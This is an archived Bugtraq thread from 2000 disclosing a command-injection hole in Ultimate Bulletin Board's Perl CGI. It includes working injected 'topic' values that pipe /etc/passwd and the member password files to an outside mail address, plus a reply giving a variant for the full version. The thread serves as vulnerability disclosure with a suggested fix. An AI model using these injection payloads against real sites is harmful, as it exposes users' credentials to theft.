It works on the full version also... Little different syntax: topic=012345.cgi|cat%20../Members/*|mail hackerat_private| (note the ../ on the Members. You have to go up a directory to get the file. Maybe you could stop it via simple folder permissions??) Regards, Kevin Hillabolt ----- Original Message ----- From: "Sergei A. Golubchik" <sergat_private> To: <BUGTRAQat_private> Sent: Friday, February 11, 2000 1:49 PM Subject: perl-cgi hole in UltimateBB by Infopop Corp. > Hello. > > Writing cgi scripts in perl is simple. It's also rather safe, > providing authors follow very simple instructions. But they don't. > > Browsing some site, I found that their forums were based not on home- > made scripts, but rather commercial software product. Hey, said I to > myself, remember those story about pcweek hack ? They use commercial > package photoads. Let's look what that Ultimate Bulletin Board by > Infopop is. > > I grabbed freeware version from http://www.ultimatebb.com and > after 10-minutes grepping found those lines: > > ubb_library.pl:901-902 > if ($ThreadFile =~ /\d\d\d\d\d\d\.ubb/) { > open (MESSAGE, "$ForumsPath/Forum$number/$ThreadFile"); > > (notice? not /^\d\d\d\d\d\d\.ubb$/. What did the author think about while > writing it ? Girls ?) > > And the $ThreadFile takes its value directly from the hidden (hmm!) > field `topic'. > > So when I filled the form with > topic='012345.ubb|mail hackerat_private </etc/passwd|' > It happily gives me /etc/passwd. And > topic='012345.ubb|cat Members/*|mail hackerat_private|' > shows all users of bulletin board, and their passwords too (in cleartext!). > > So one should only open "reply" form in the forum, save it to disk, > and set topic field to whatever he want. And this stupid UBB (at least > freeware version) doesn't keep the logs (unless, so-called, hacklog, > used when the condition above is not met). > > The fix is obvious. But the rule of the thumb is "do not use magic perl open". > At least in cgi scripts. If you want to open regular file, sysopen does > the trick as well. > > And again: CHECK EVERYTHING! > > Regards, > SerG. > > P.S. Vendor was notified. > >
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:34:53 PDT